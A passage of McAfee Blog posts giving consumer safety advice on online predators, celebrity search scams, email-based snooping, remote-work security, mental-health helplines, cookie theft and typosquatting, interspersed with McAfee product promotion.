It’s crucial to teach your kids to look out for strangers who are “too friendly” or excessively understanding. Tell them that predators keep themselves updated with the latest movies, music, and trends to seem younger and easily start conversations with children. Remember, predators will say anything to appear more youthful than they actually are.

Red Flags and Warning Signs 

You don’t always know what your children are doing online. Their digital footprints could be anywhere. That’s why it is imperative to understand the red flags and warning signs that may signal a hazardous online interaction, especially when they already encounter a predator, and you’re still in the shadow. 

• Identifying Suspicious Behavior in Online Contacts: Your children should be cautious if someone they’re communicating with online excessively flatters them, evades questions about their identity, provides inconsistent information, or repeatedly pushes boundaries. Isolation attempts, where the contact discourages your child from discussing the interaction with others or emphasizes secrecy, should raise concerns. 
• Recognizing Signs of Manipulation and Coercion: Online predators often employ manipulative tactics to gain control over their targets. Your child should be aware of emotional manipulation, blackmail, and threats, all signs of coercion. Predators may work to build false trust by pretending to be the only one who cares about or understands the child. If the contact insists on secrecy, isolates your child from real-world activities, or uses emotional manipulation, it’s crucial for your child to recognize these tactics and take them seriously. And you, as a parent, should acknowledge your child’s behavior when they’re being emotionally manipulated. 
• Understanding When to Seek Help or Report Concerning Interactions: Open communication is crucial to your child’s safety. Encourage them to talk to you about any concerns regarding their online interactions. Help your child trust their instincts; if something doesn’t feel right or makes them uncomfortable, they should share those feelings with a trusted adult. Ensure they know how to report concerning interactions on the platforms they use and don’t hesitate to involve law enforcement if you suspect contact with an online predator. In some cases, seeking professional help may also be necessary to support your child’s recovery from a traumatic online experience. Building a foundation of trust and proactive communication is essential for online safety.

Teaching Kids to Guard their Online Presence

Reinforcing the importance of online privacy is a crucial step in protecting your kids from virtual predators. Teach your children that personal information such as their full name, address, school, and phone number should never be shared online. They must also understand that specific images and details about their life can also reveal too much to an online predator. Remind them to limit geotagged photos as this can expose their location, and also to strictly control who is able to view their social media accounts.

→ Dig Deeper: Why You Should Think Before Geotagging that Selfie

Explain to your kids the dangers of accepting friend requests or communicating with strangers online. Make them aware that individuals posing as children or teenagers could be adults with malicious intent. Reinforce that anyone who asks them to keep a conversation secret or requests for personal information or inappropriate content is a potential danger, and they should inform you immediately if this occurs.

→ Dig Deeper: Making Online Safety a Priority for Our Tech-Savvy Children

Implementing Online Safety Measures

As parents, we must stay informed about our children’s online activities, which goes far beyond just asking them about it. This can involve regularly reviewing their social media profiles and friends lists and ensuring they only interact with people they know personally. Familiarize yourself with the platforms and apps your children use to comprehend their functionalities and potential risks better. 

Creating house rules regarding internet use can be an effective measure to ensure online safety. This could involve having specific periods when the internet can be used, limiting the time spent online, and setting out where internet-access devices can be used. For instance, allowing internet use only in common areas instead of bedrooms can be a good practice. It is essential to have ongoing dialogues about these rules and their reasons so your children can understand and appreciate their importance.

Final Thoughts

In an age where the online world is a significant part of our children’s lives, online safety education is essential. It’s crucial that, as parents, caregivers, and mentors, we take proactive steps to protect our children from the pervasive threat of online predators. This means having open and ongoing conversations about the real dangers that can lurk behind a screen, teaching kids to guard their online presence, and implementing online safety measures. Together, we can ensure the internet becomes safer for our children to learn, explore, and connect with others. Protect your whole family with McAfee+ Family plans.

The post Could Your Kids Spot an Online Predator? appeared first on McAfee Blog.

In the age of digital data and Internet access, the potential for scams is more significant than ever. These scams often involve leveraging popular search queries to trap unsuspecting netizens into their malicious schemes. Among the top searches in the online world, celebrities hold a prime spot. Through this guide, we aim to shed light on how scammers take advantage of the global fascination with celebrities to target their potential victims.

As digital users, most of us are likely well-acquainted with the phrase “Just Google it.” The search engine has become a go-to source for any information ranging from essential daily needs to entertainment gossip. But it’s crucial to remember that while you’re in pursuit of data, scammers are in search of their next victim.

Celebrity Bait: The Evolution of Modern Scams

Scammers have significantly evolved with the advancement of technology. They’ve mastered the art of creating fake or infected websites that can harm your computer systems, extract your financial information, or even steal your identity. Their strategies often include luring victims through popular searches, such as the latest Twitter trends, breaking news stories, major world events, downloads, or even celebrity images and gossip. The higher the popularity of the search, the greater the risk of encountering harmful results.

McAfee has conducted research for six consecutive years on popular celebrities to reveal which ones are riskiest to search for online. For instance, Emma Watson outplaced Heidi Klum as the most dangerous celebrity to look up online. Interestingly, it was the first year that the top 10 list comprised solely of women. Cybercriminals commonly exploit the names of such popular celebrities to lead users to websites loaded with malicious software, consequently turning an innocent search for videos or pictures into a malware-infected nightmare.

→ Dig Deeper: Emma Watson Video Scam: Hackers Use Celeb’s Popularity to Unleash Viruses 

The Lure of “Free”

Scammers are well aware of the allure the word “free” holds for most Internet users. They cleverly exploit this to get your attention and draw you into their traps. For instance, when you search for “Beyonce” or “Taylor Swift” followed by prompts like “free downloads”, “Beyonce concert photos”, or “Taylor Swift leaked songs”, you expose yourself to potential online threats aiming to steal your personal information. It’s always prudent to maintain a healthy level of skepticism when encountering offers that seem too good to be true, especially those labeled as “free.”

While the internet can be a dangerous playground, it doesn’t mean that you cannot protect yourself effectively. Using common sense, double-checking URLs, utilizing safe search plugins, and having comprehensive security software are some strategies to help ensure your online safety. This guide aims to provide you with insights and tools to navigate the online world without falling prey to its many hidden dangers.

Practical Tips To Guard Against Celebrity Scams

Truth be told, the responsibility for online safety lies primarily with the user. Just as you would not walk into any shady-looking place in real life, it requires a similar instinct to avoid shady sites while browsing online. One important piece of advice – if something appears too good to be true, in all probability, it is. So, take note of these practical tips to help you guard against celebrity scams and other online threats:

• Exercise Skepticism: The first line of defense against online scams is skepticism. If something seems too good to be true, chances are it probably is. Be highly cautious when encountering online content that promises unbelievable giveaways, jaw-dropping discounts, or exclusive access to celebrities. Scammers often use these enticing offers to lure unsuspecting victims.
• Inspect Web Addresses: Take a careful look at the web address you are directed to. For instance, if you are searching for Amazon.com but are taken to “Amazzon.cn,” be alert. This could be a phishing site looking to steal your information.

→ Dig Deeper: How to Tell Whether a Website Is Safe or Unsafe

• Install Safe Search Plugins: To bolster your online safety, consider installing safe search plugins such as McAfee Web Advisor software. These plugins integrate with your web browser and provide real-time safety ratings for websites that appear in your search results. They act as a virtual safety net, warning you about potentially harmful or deceptive sites before you click on them.

• Verify Celebrity Accounts: When interacting with celebrity content or profiles on social media platforms, take a moment to verify their authenticity. Look for verified badges or check marks that indicate the account is genuine. Celebrities often have official accounts that are authenticated by the platform.

• Educate Yourself: Stay informed about common online scams and tactics used by cybercriminals. Knowledge is a powerful defense. Familiarize yourself with the latest scams and phishing techniques to recognize and avoid potential threats.

• Regularly Update Software: Keep your operating system, web browsers, and security software up to date. Software updates often contain important security patches that protect against known vulnerabilities

→ Dig Deeper: The Big Reason Why You Should Update Your Browser (and How to Do It)

Why Comprehensive Security Software is Essential

Having comprehensive security software installed on your devices is another crucial step towards preventing scams. Good antivirus software can protect against the latest threats, alert you about unsafe websites, and even detect phishing attempts. Furthermore, always keep your security software and all other software updated. Cybercriminals are known to exploit vulnerabilities in outdated software to infiltrate your devices and steal your data.

Apart from ensuring you have security software, be cautious about what you download on your devices. Trojans, viruses, and malware are often hidden in downloadable files, especially in sites that offer ‘free’ content. Cybercriminals tempting users to download infected files often use popular celebrity names. Therefore, download wisely and from reputed sources.

McAfee Pro Tip: Before committing to a comprehensive security plan, it’s crucial to evaluate your security protection and analyze your requirements. This proactive stance forms the bedrock for crafting strong cybersecurity measures that cater precisely to your unique needs and potential vulnerabilities. For more information about our acclaimed security solutions, explore our range of products. 

Final Thoughts

In the digital world, where information and entertainment are available at our fingertips, it’s crucial to remain vigilant against scams, especially those involving celebrities. By exercising prudent online practices like scrutinizing URLs, using safe search plugins, and installing comprehensive security software, we can significantly reduce our risk of falling prey to these scams.

It’s imperative to understand that the popularity of a search term or trend is directly proportional to the risk it carries. So next time, before you search for your favorite celebrity, remember, the more famous the celebrity, the greater the risk. Together with McAfee, let’s promote safer browsing practices and contribute to a safer online community for all.

The post Celebrities Are Lures For Scammers appeared first on McAfee Blog.

If You Give A Hacker Your Email Address

Most of us believe hacking to be an event that happens to ‘the other person,’ often refusing to accept that it could very much be a reality for us as well. While hacking and social engineering might seem like concepts only prevalent in big-screen thrillers, the truth is they occur more frequently than we’d like to admit. Your email address, innocuous as it may seem, is often one of the gateways into your digital persona. This article aims to shed light on the potential dangers and impacts of giving away your email address to the wrong people.

To offer a real-life perspective, we’ll follow a conversation with an ethical hacker called ‘Oz.’ Ethical hackers, or ‘white hat’ hackers, are those who use their hacking skills to uncover security vulnerabilities and help implement protective measures against other malevolent hackers, known as ‘black hat’ hackers. Despite Oz’s assurance that he belongs to the white hat category, the following discourse will reveal how much information a hacker can come across based solely on your email address.

→ Dig Deeper: Are All Hackers Bad?

Communication with Oz: An Eye-Opener

Initiating communication with Oz took a toll on my nerves, considering the potential threat to my data privacy. For communication, Oz suggested using an email address, prompting me to create a separate email account solely for our conversations. Once the lines of communication were established, I posed my first question: “Suppose we met at a coffee shop, exchanged pleasantries, and all I left you with was my email address. What kind of information could you gather about me?”

An hour later, Oz responded with my work and home phone numbers, home address, birth date, and year. But the real shocker was a casual remark about my meeting with Lt. Governor Gavin Newsom, followed by a link to a picture I had no memory of sharing publicly. On clicking the link, I received another email from Oz, stating that he had discovered my preferred internet browser, my operating system, and my IP address, essentially knowing my geographical coordinates. At this point, it became crystal clear just how much information a hacker can unearth based on an email address alone. 

The Importance of Online Safety

The experience with Oz was a stark reminder of the importance of online safety. We often let our guards down, readily providing information and clicking on links without giving it a second thought. However, this is exactly the kind of behavior that hackers rely on for their activities. It is crucial to remember that the internet is a public space, and every piece of information we share can potentially be accessed and misused by malicious parties.

In the next sections of this guide, we’ll delve deeper into the mechanisms hackers use to derive information from an email and the measures you can take to secure your digital identity. The aim is to provide you with practical steps to ensure your online safety and maintain your privacy in the digital world.

The Mechanism Behind The Hacks

When you give out your email address to a hacker, they have a significant amount of information at their fingertips. Understanding the mechanisms that hackers employ to exploit your online presence is essential to appreciate the gravity of the online safety challenge. When a hacker gains access to your email address, they effectively open the door to a wealth of information about you. Let’s find out how this works:

• Reverse Email Lookup: The first step for a hacker after acquiring your email address is often to perform a ‘reverse email lookup.’ This process involves using your email address to trace any associated social media accounts. Many individuals use the same email address for various online platforms, making it relatively easy for hackers to link your digital footprint across different sites. Once they’ve identified your social media profiles, they can glean valuable insights into your personal life, interests, and potentially even more sensitive information you’ve chosen to share publicly on these platforms.
• Email-Tracking Apps: Hackers can employ sophisticated email-tracking applications or techniques to gather even more information. These tools are designed to surreptitiously monitor your email interactions. 
• IP Address Tracking: When you open an email, it often contains hidden elements that reveal your IP address. This information can be used to determine your approximate geographical location. Hackers can gain insights into where you are located, potentially compromising your physical safety or facilitating further cyberattacks.
• Activity Monitoring: Email-tracking apps can notify the hacker when you open the email, providing them with a timestamp of your activity. This information can be used to deduce when you are most active online, which can be exploited for phishing attacks or other malicious activities.
• Link Interaction Tracking: By embedding tracking pixels or unique links within emails, hackers can discern which links you click on and even monitor your actions on linked web pages. This level of surveillance allows them to understand your interests, preferences, and potential vulnerabilities. In the case of the Oz experiment, clicking on what appeared to be a harmless link had far-reaching consequences, as the hacker was able to monitor subsequent online behavior, leading to the exposure of additional personal information.

→ Dig Deeper: Mobile Spyware: How Hackers Can Turn Your Phone Into a Stalking Machine

Knowing these tactics highlights the importance of practicing caution and diligence when it comes to email and online interactions. Safeguarding your digital identity requires a combination of awareness, security measures, and privacy-conscious practices. It also underscores the need for robust cybersecurity measures on both individual and organizational levels to protect against these types of intrusive and potentially harmful activities.

Protecting Your Digital Identity

Knowing all this, it is imperative to find ways to protect yourself from such intrusions. In addition to knowing what makes hackers tick, there are several insights and practices you should consider to enhance your online security and privacy:

• Strong Passwords: Create strong, unique passwords for each of your online accounts. Use a combination of letters, numbers, and special characters. Consider using a reputable password manager to generate and store complex passwords securely.
• Two-Factor or Multi-Factor Authentication (MFA): Enable 2FA or MFA wherever possible. This adds an extra layer of security by requiring you to provide two or more forms of verification, such as a password and a fingerprint or a one-time code sent to your phone.
• Regular Updates: Keep your operating system, software, and antivirus programs up to date. Cybersecurity vulnerabilities are often patched in these updates, so failing to update can leave you exposed.
• Phishing Awareness: Educate yourself about phishing scams. Be wary of emails or messages requesting sensitive information, especially if they urge you to act urgently. Double-check the legitimacy of such requests with the supposed sender through a different channel of communication.

→ Dig Deeper: How to Spot Phishing Lures

• Secure Wi-Fi: Ensure your home Wi-Fi network is password-protected and uses strong encryption. Avoid using public Wi-Fi for sensitive activities unless you are using a VPN (Virtual Private Network) for added security.
• Regular Backups: Back up your important data regularly, and store backups offline or in the cloud. In case of a ransomware attack or data loss, you’ll have a safe copy of your information.
• Social Engineering Awareness: Be cautious about what you share on social media. Cybercriminals often gather information from social profiles to craft convincing spear-phishing attacks. Limit the personal information you make public.
• Email Verification: Verify email senders, especially when dealing with financial or sensitive matters. Look out for red flags such as misspellings or suspicious email addresses.
• Safe Browsing Habits: Avoid visiting dubious websites or downloading files from untrusted sources. Use ad-blockers and ensure that your web browser settings are configured for enhanced privacy and security.
• Security Software: In addition to antivirus software, consider using anti-malware and anti-spyware programs to bolster your defense against various types of threats. McAfee+ and McAfee Total Protection are your best options if you want to have an all-inclusive software security. 
• Cybersecurity Education: Stay informed about the latest cybersecurity threats and best practices. Cybersecurity is an evolving field, and awareness is a powerful defense.
• Incident Response Plan: Develop a plan for responding to security incidents. Know how to disconnect from the internet, contact authorities if necessary, and recover from an attack.

McAfee Pro Tip: For your peace of mind, get McAfee+, which comes with a $2M identity theft coverage and setup assistance, to make a sound incident response plan if your email got hacked and sensitive information got compromised. 

Remember that while it’s essential to take these precautions, no system is completely invulnerable. Cyber threats are continually evolving, so staying vigilant and proactive is crucial to maintaining your online security and privacy.

Conclusion

An email address might seem like a tiny part of your life, but in the wrong hands, it can lead to a significant breach of your privacy. It’s important to remember that the safety measures you take or fail to take can have real-world effects. Therefore, it’s crucial to keep a vigilant eye on your digital persona, how you navigate the World Wide Web, and who has access to your information. The key to internet safety lies within our control – cautious, knowledgeable, and proactive steps to protect your digital identity. At McAfee, we’re always here to remind you that the internet is only as secure as you make it.

The post If You Give A Hacker Your Email Address… appeared first on McAfee Blog.

In the shadow of the COVID-19 pandemic, workplaces worldwide have undergone a seismic shift towards remote working. This adjustment involves much more than just allowing employees to access work resources from various locations. It necessitates the update of remote working policies and heightened cybersecurity security awareness.

Cybercriminals and potential nation-states are reportedly exploiting the global health crisis for their own gain. Hackers have targeted an array of sectors, including healthcare, employing COVID-19-related baits to manipulate user behavior. This article aims to provide a comprehensive guide on how you, as an employee, can augment your cybersecurity measures and stay safe when working remotely.

Understanding the Threat Landscape

It has been reported that criminals are using COVID-19 as bait in phishing emails, domains, malware, and more. While the exploitation of this global crisis is disheartening, it is unsurprising as criminals habitually leverage large events to their advantage. That said, it’s crucial to identify potential targets, particularly in certain geographic regions.

The data so far reveals a broad geographic dispersion of ‘targets,’ with many countries that are typical phishing targets being hit. However, there are anomalies such as Panama, Taiwan, and Japan, suggesting possible campaigns targeting specific countries. The landscape is continuously evolving as more threats are identified, necessitating vigilant monitoring on your part to stay safe.

→ Dig Deeper: McAfee Labs Report Reveals Latest COVID-19 Threats and Malware Surges

Contextualizing Working from Home Threats

The abrupt shift to remote work has left many employees unprepared, with some needing to operate from personal devices. These personal devices, if lacking appropriate security measures, can expose both you and your company or employer to various potential attacks.

Over the last few years, there has been a surge in targeted ransomware attacks, particularly through “commodity malware.” This malware type is often directed at consumers. Consequently, accessing work networks from potentially infected personal devices without appropriate security measures significantly increases the risk. Both employees and employers are left vulnerable to breaches and ransomware lockdowns.

Know the Risks of Online Connectivity and Collaboration

Office closures and working-from-home mandates due to COVID-19 permanently changed the way we look at workplace connectivity. A recent Fenwick poll among HR, privacy, and security professionals across industries noted that approximately 90% of employees now handle intellectual property, confidential, and personal information on their in-home Wi-Fi as opposed to in-office networks. Additionally, many are accessing this information on personal and mobile devices that often do not have the same protections as company-owned devices. The elevated number of unprotected devices connected to unsecured networks creates weak areas in a company’s infrastructure, making it harder to protect against hackers.

One technology your organization should be especially diligent about is video conferencing software. Hackers can infiltrate video conferencing software to eavesdrop on private discussions and steal vital information. Many disrupt video calls via brute force, where they scan a list of possible meeting IDs to try and connect to a meeting. Others seek more complex infiltration methods through vulnerabilities in the actual software. Up until recently, Agora’s video conferencing software exhibited these same vulnerabilities.

Hackers will usually try to gain access to these network vulnerabilities by targeting unsuspecting employees through phishing scams which can lead to even greater consequences if they manage to insert malware or hold your data for ransom. Without proper training on how to avoid these threats, many employees wouldn’t know how to handle the impact should they become the target.

Remote Working: Best Practices

If you’re an employee working remotely, it is essential to comprehend and adhere to best security practices. Here are some guidelines you could follow:

1. Remote Working Policy Guidance: Understand clearly what the remote working expectations of your company are, especially with respect to security practices.
2. Asset Classification: With added security, make previously inaccessible information available for remote use.
3. Strong Authentication: Secure access to key assets using two-factor authentication.
4. Awareness: Be informed about the potential risks of connecting remotely and the need to exercise caution while accessing authorized shared services and handling targeted phishing emails.
5. VPN Access: Use virtual private networks (VPNs) for a secure connection from untrusted networks.
6. Regular Software Updates: Ensure that your operating system, software applications, and security tools are regularly updated with the latest patches and updates. Cybercriminals often target known vulnerabilities in outdated software.
7. Firewall Protection: Activate and maintain a firewall on your remote device to block unauthorized access and protect your system from malicious traffic.
8. Safe Online Behavior: Exercise caution when clicking on links, downloading files, or opening email attachments, even if they appear to be from trusted sources. Verify the authenticity of such content to avoid falling victim to phishing attempts.
9. Physical Security: Ensure that your remote work area is secure. Lock up any physical documents or devices containing sensitive information when they are not in use.
10. Secure Mobile Device Usage: If you use a mobile device for work, ensure it is protected with a strong passcode or biometric authentication. Install security apps to remotely wipe the device if it is lost or stolen.
11. Collaboration Etiquette: When collaborating with colleagues remotely, be mindful of data-sharing practices and adhere to your organization’s collaboration guidelines to maintain security.
12. Separate personal and business devices: We may have brought work home with us, but nonetheless, we must strive to maintain a work/life balance and set boundaries between our personal and work life. Setting these boundaries makes it easier to separate the technology we use in our lives as well. Avoid sharing your company’s devices with family members who are not aware of the best security practices, especially children. Also, keep personal accounts separate from company accounts to prevent sharing information through personal channels.

Security Solutions and Tools

Considering the rise of remote working, it is more crucial than ever for employees, especially those working remotely, to invest in secure solutions and tools. However, as end-users, it’s also wisest to take extra steps like installing comprehensive security software to ward off cyber threats. These software have features that collectively provide a holistic approach to security, detecting vulnerabilities, and minimizing the chance of an attack.

We recommend McAfee+ and McAfee Total Protection if you want an all-inclusive security solution. With a powerful combination of real-time threat detection, antivirus, and malware protection, secure browsing, identity theft prevention, and privacy safeguards, McAfee+ and McAfee Total Protection ensure that your devices and personal information remain secure and your online experience is worry-free. 

McAfee Pro Tip: Gauge your security protection and assess your security needs before you get a comprehensive security plan. This proactive approach is the foundation for establishing robust cybersecurity measures tailored to your specific requirements and potential vulnerabilities. Learn more about our award-winning security products award-winning security products. 

Tailored Security Education for Employees

In the current digital age, employees must be aware of their crucial role in maintaining organizational security. As such, you should consider engaging in tailored security education and training programs that help employees identify and avoid potential threats such as phishing and malicious downloads. Regular training and updates can be beneficial as employees are often the first line of defense and can significantly help mitigate potential security breaches.

To ensure effective acquisition of knowledge, engage in security training that is designed in an engaging, easy-to-understand manner and utilizes practical examples that you can relate to. Successful training programs often incorporate interactive modules, quizzes, and even games to instill important security concepts. 

Enhancing Communication and Collaboration

Effective communication and collaboration are paramount in a remote working environment. Employees need to share information and collaborate on projects effectively while ensuring that sensitive information remains secure. Use and participate in platforms that enable secure communication and collaboration. Tools such as secure messaging apps, encrypted email services, secure file sharing, and collaboration platforms will ensure information protection while allowing seamless collaboration.

Make sure that you’re provided with detailed guidelines and training on the proper use of these tools and their security features. This will help prevent data leaks and other security issues that can arise from misuse or misunderstanding.

→ Dig Deeper: Five Tips from McAfee’s Remote Workers

Conclusion

The transition to a remote working environment brings with it various cybersecurity challenges. Prioritizing secure communication and collaboration tools, coupled with ongoing education and adherence to best practices, can help you navigate these challenges with confidence, ultimately reaping the benefits of a flexible and efficient remote work environment while safeguarding critical data and information. McAfee can help you with that and more, so choose the best combination of features that fits your remote work setup. 

The post Staying Safe While Working Remotely appeared first on McAfee Blog.

I’m such a fan of RUOK? Day. Started in 2009, it’s an Australian non-profit suicide prevention that is all about having conversations with others to address social isolation and promote a sense of community. What I love the most, is that RUOK? Day has become quite an event on the Australian calendar. You’d be hard-pressed to find a workplace that doesn’t host a morning tea or a retailer that’s not selling a ribbon or badge in support of the day. In my opinion, it has given many of us the confidence to talk about mental health and that, my friends, is a very good thing!

When You’re Not Feeling OK

You wouldn’t be human if you hadn’t ever felt a little down or anxious. It’s the natural ebb and flow of daily life. However, if these symptoms are hanging around and are affecting your ability to ‘do’ life then, it’s time to take some action.

Remember, it is incredibly common for someone to experience a dip in their mental health. Recent research shows that over 2 in 5 Aussies aged 16 to 85 will experience a mental disorder at some time in their life, with 1 in 5, experiencing a mental disorder in the previous 12 months.

If you’re not feeling OK, the most important thing to remember is that you do not need to deal with this all by yourself. Sometimes when you’re feeling really low, the thought of leaving the house and facing the world can feel too much. I totally get it! And that’s where the online world can play a huge role. There is an abundance of resources available online for anyone who needs mental health support which makes it so much easier to get the help you need when facing the world just feel a bit much.

Where To Go Online When You’re Not Feeling OK

Here is a list of organisations that offer online mental health services here in Australia. This list is not exhaustive however these are the most commonly used, and hence best funded, support services. If you are based in the US, please find details at the end of the post for organisations that can provide mental health support.

When Things Are Pretty Dire

• The Suicide Call-Back Service offers free professional 24/7 counselling support to Aussies at risk of suicide, concerned about someone at risk, affected by suicide as well as people experiencing emotional or mental health issues. There is an option for telephone support as well as online chat and video counselling also.
• If you need to speak to someone ASAP then contact Lifeline. They offer a free 24/7 confidential one to one counselling service that can help you in a crisis. You can, of course, choose to speak to someone on the telephone (13 11 14) but you also have the option of either messaging or texting (0477 13 11 14) with a counsellor also.
• Beyond Blue is another great Aussie mental health and wellbeing support service that can help in an emergency. Again, it offers 24/7 confidential counselling services for anyone who is struggling. Telephone counselling is an option here (1300 22 4636) but if you’d prefer, you can use their web chat option here.

Online Help Specifically For Young People

• Kids Helpline is a dedicated 24/7 support service for young people aged 5 to 25 who want to chat for any reason. It’s free (even from a mobile phone) and there is a choice of telephone counselling or support via web chat or email. You can also access support if you are an adult supporting a young person. Since it was established in 1991, the service has supported over 8.5 million people. The service offers everything from life-saving crisis intervention through to emotional support when young people just need someone to listen.
• Headspace is Australia’s Mental Health Young Foundation. It also provides free online and telephone support from 9am to 1am AEST, 7 days a week for young people (12-25) and their families. In addition to its crisis support services, it also offers regular counselling options through its network of 150 centres around Australia.

Other Services

• The Butterfly Foundation’s National Helpline is a free confidential service that provides information, counselling, and treatment referral for people (and their families) with eating disorders and body image issues. It operates between 8am and midnight, 7 days a week and offers support via telephone (1800 33 4673), email and web chat. This is not a crisis service.
• Friendline is a telephone and chat support service for anyone who’s feeling lonely, needs to reconnect or just wants a chat. You can call them 7 days a week on 1800 424 287, or chat online with one of their trained volunteers. All conversations with FriendLine are anonymous. This is not a crisis service.
• MensLine Australia is a professional telephone and online counselling service offering support to Australian men 24 hours/7days a week. Whether it’s addiction issues, domestic violence, anxiety or depression, the service is able to offer support on 1300 78 99 or via online or video chat.
• Open Arms – Veterans and Families Counselling provides 24/7 free and confidential telephone and webchat counselling to anyone who has served at least one day in the Australian Defence Force, their partner, and their families. It isn’t a crisis service, but it can offer ongoing mental health treatment and services.

So, if you are not just yourself at the moment and are feeling really low – or you know someone that is – please know that there is help available online 24/7. So, make yourself a cuppa and get started because you are not alone.

Alex xx

P.S. For my US friends:

The 988 Suicide & Crisis Helpline provides 24/7 free and confidential support and crisis resources for people in distress, and their families. Simply text or call 988 to access help.

The Crisis Text Line is a free and confidential 24/7 support service for anyone who resides in the US. Support can be accessed by text message (text HOME to 741-741) and online chat.

The post RUOK Day – How to Get Help Online When You’re Not Feeling OK appeared first on McAfee Blog.

Chocolate chip, oatmeal raisin, snickerdoodle: Cybercriminals have a sweet tooth just like you. But their favorite type of cookie is of the browser variety.

Browser cookies – often just referred to as cookies – track your comings and goings on websites. And when a cyber thief gets their mitts on your browser cookies, it can open all kinds of doors into your online accounts.

The first step to protecting your devices and online privacy from criminals is to understand their schemes. Here are the key terms you need to know about cookie theft plus how to keep malicious software off your devices.

Key Cookie Theft Terms You Should Know

Cookie theft can happen to anyone. Knowing the basics of this cyberscheme may help you better protect your online life:

• Browser cookie. A small collection of data your internet browser stores every time you visit a website. When your browser stores this data, it makes it quicker for you to log back into a website or for a website to customize its suggestions for you the next time you visit.
• Cache. Like a mouse scurrying away a pile of sweet treats, your device hoards – or caches – all the cookies you gather from websites you visit. Your cache of cookies will grow continually until you clear it out. If your cache grows too large, it could slow down your device, affect performance, or tax your battery power.
• Multifactor authentication. MFA is a way to log in to an online account that requires additional forms of identification beyond a username and password. It could require biometric identification (like a face or fingerprint scan), a security question, or a one-time code.

How and Why Do Criminals Steal Browser Cookies?

Cookies thieves are generally motivated by the financial gains of breaking into people’s online accounts. Banking, social media, and online shopping accounts are full of valuable personal and financial details that a cybercriminal can either sell on the dark web or use to impersonate you and steal your identity.

Malware is generally the vehicle cybercriminals use to steal cookies. Once the malicious software gets onto a device, the malware is trained to copy a new cookie’s data and send it to the cybercriminal. Then, from their own machine, the cybercriminal can input that data and start a new session with the target’s stolen data.

There was a stretch of a few years where cookie thieves targeted high-profile YouTube influencers with malware spread through fake collaboration deals and crypto scams. The criminals’ goal was to steal cookies to sneak into the backend of the YouTube accounts to change passwords, recovery emails and phone numbers, and bypass two-factor authentication to lock the influencers out of their accounts.¹

But you don’t have to have a valuable social media account to draw the eye of a cybercriminal. “Operation Cookie Monster” dismantled an online forum that sold stolen login information for millions of online accounts gained through cookie theft.²

Best Practices for Secure Browsing

To keep your internet cookies out of the hands of criminals, it’s essential to practice safe browsing habits. These four tips will go a long way toward keeping your accounts out of the reach of cookie thieves and your devices free from malicious software.

1. Set up MFA. MFA may seem like it’ll slow down your login process, but really, the extra seconds it takes are well worth it. Most people have their phone within arm’s reach throughout the day, so a texted, emailed, or authentication app-generated code is easy enough to access. Just remember that a reputable company will never ask you for one-time codes, so these codes are for your eyes only. MFA makes it extremely difficult for a criminal to log into your accounts, even when they have your password and username. Without the unique code, a bad actor is locked out.
2. Watch out for phishing attempts and risky websites. Cookie-stealing malware often hops onto innocent devices through either phishing lures or through visiting untrustworthy sites. Make sure to carefully read every text, email, and social media direct message. With the help of AI content generation tools like ChatGPT, phishers’ messages are more believable than they were years ago. Be especially diligent about clicking on links that may take you to risky sites or download malicious files onto your device.
3. Clear your cache regularly. Make it a habit to clear your cache and browsing history often. This is a great practice to optimize the performance of your device. Plus, in the case that a cybercriminal does install cookie-stealing malware on your device, if you store hardly any cookies on your device, the thief will have little valuable information to pilfer.
4. Use a password manager. While a password manager won’t protect your device from cookie-stealing malware, it will lessen your dependence upon storing valuable cookies. It’s convenient to already have your usernames and passwords auto-populate; however, if your device falls into the wrong hands these shortcuts could spell trouble for your privacy. A password manager is a vault for all your login information for your dozens of online accounts. All you need to do is input one master password, and from there, the password manager will autofill your logins. It’s just as quick and convenient, but infinitely more secure.

Lock Up Your Cookie Jar

McAfee+ is an excellent partner to help you secure your devices and digital life. McAfee+ includes a safe browsing tool to alert you to suspicious websites, a password manager, identity monitoring, and more.

The next time you enjoy a cookie, spare a moment to think of cookies of the digital flavor: clear your cache if you haven’t in awhile, doublecheck your devices and online accounts for suspicious activity, and savor the sweetness of your digital privacy!

¹The Hacker News, “Hackers Stealing Browser Cookies to Hijack High-Profile YouTube Accounts”

²CNN, “‘Operation Cookie Monster:’ FBI seizes popular cybercrime forum used for large-scale identity theft”

The post Cookie Theft: How to Keep Cybercriminals Out of Your Accounts appeared first on McAfee Blog.

Your teacher was right. Spelling counts, particularly to scammers.

Enter the world of typosquatting scams. Also known as URL hijacking, typosquatting scams target internet users who incorrectly type a website address into their web browser.

Scammers have long used typosquatting techniques to capture traffic from those butterfingers moments we all have when typing on our keyboards. And the butterthumbs moments on our phones.

For example, say you type “websiteaddresss dot-com” instead of “websiteaddress dot-com.” More than just a mistake, a mistyped address might land you on a malicious site designed to steal personal information, make money, or spread malware.

The scam sites you might land on vary. Some serve up a screenload of spammy ads. Others host malicious download links, and yet more lead to stores full of cheap, knockoff goods. In other cases, scammers take it up a notch. We’ve seen typosquatting sites evolve into clever copycats of legitimate sites. Some look like real banking and e-commerce sites that they steal traffic from, complete with stolen logos and familiar login screens. With this, scammers hope to trick you into entering your passwords and other sensitive information.

Companies are well aware of this practice. Many purchase URLs with those common misspellings and redirect them to their proper sites. Further, many brands put up anti-fraud pages on their sites that list the legitimate addresses they use to contact customers. Here at McAfee, we have an anti-fraud center of our own.

The fact remains, people make mistakes. And that can lead to risky scam sites. However, you can still avoid typosquatting attacks quite easily.

The big business of typosquatting

For starters, it helps to know that typosquatting is often big business. In many cases, larger cybercrime organizations set up entire flights of malicious sites that can number into the dozens to the hundreds.

Let’s check out a few examples and see just how sophisticated typosquatting scams can be:

“dot.cm” scams

In 2018, researchers found a host of addresses that were registered in the names of well-known sites, but ending in  “.cm”, instead of “.com”. These copycat addresses included financial websites, such as “Chase dot-cm” and “Citicards dot-cm,” as well as social and streaming sites.

Scammers used the .cm sites to advertise promotions and surveys used to collect users’ personal information. What’s more, more than 1,500 of them were registered to the same email address, indicating that someone was trying to turn typosquatting into a serious business.

“dot.om” scams

Similarly, 2016 saw the advent of malicious dot-om sites, that mimicked big names like “linkedin dot-om” and “walgreens dot-om.” Even the interesting typo found in “youtubec dot-om” cropped up. Of note, single entities registered these sites in batches. Researchers found that individuals or companies registered anywhere from 18 to 96 of them. Again, signs of serious business.

Big brand and voice assistant typosquatting scams

Recently, security researchers further found an increase in the number of typosquatting sites. An increase of 10% from 2021 to 2022. These sites mimic popular app stores, Microsoft addresses, services like TikTok, Snapchat, PayPal, and on and on.

